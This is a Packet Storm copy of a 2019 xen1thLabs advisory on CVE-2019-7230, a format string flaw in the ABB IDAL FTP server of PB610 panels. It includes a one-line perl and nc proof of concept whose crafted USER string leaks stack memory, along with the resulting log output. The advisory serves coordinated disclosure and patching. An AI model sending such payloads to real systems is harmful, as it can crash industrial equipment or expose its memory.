what you don't know can hurt you

ABB IDAL FTP Server Uncontrolled Format String

ABB IDAL FTP Server Uncontrolled Format String
Posted Jun 21, 2019
Authored by Eldar Marcussen

The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.

tags | exploit
advisories | CVE-2019-7230
MD5 | 904004a3f4b9e76ee3d9da27f7d9a6c9

ABB IDAL FTP Server Uncontrolled Format String

Change Mirror Download
XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008


CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Affected vendor
---------------
ABB (new.abb.com)


Credit
------
Eldar Marcussen - xen1thLabs - Software Labs


Vulnerability summary
---------------------
The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.


Technical details
-----------------
The IDAL FTP server does not safely handle username strings during the authentication process. Attempting to authenticate with the username `%s%p%x%d` will crash the server. Sending `%08x.AAAA.%08x.%08x` will log memory content from the stack.


Proof of concept
----------------
```
perl -e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22
````

UserManagementModule::isUserExist failed. "72657355.AAAA.616e614d.656d6567" not present in UserFactory
UserManagementModule::LoginFTPUser failed. User :"72657355.AAAA.616e614d.656d6567" not present in UserFactory


Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367


Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch


Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure


Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    1 Files
  • 26
    Sep 26th
    1 Files
  • 27
    Sep 27th
    20 Files
  • 28
    Sep 28th
    19 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close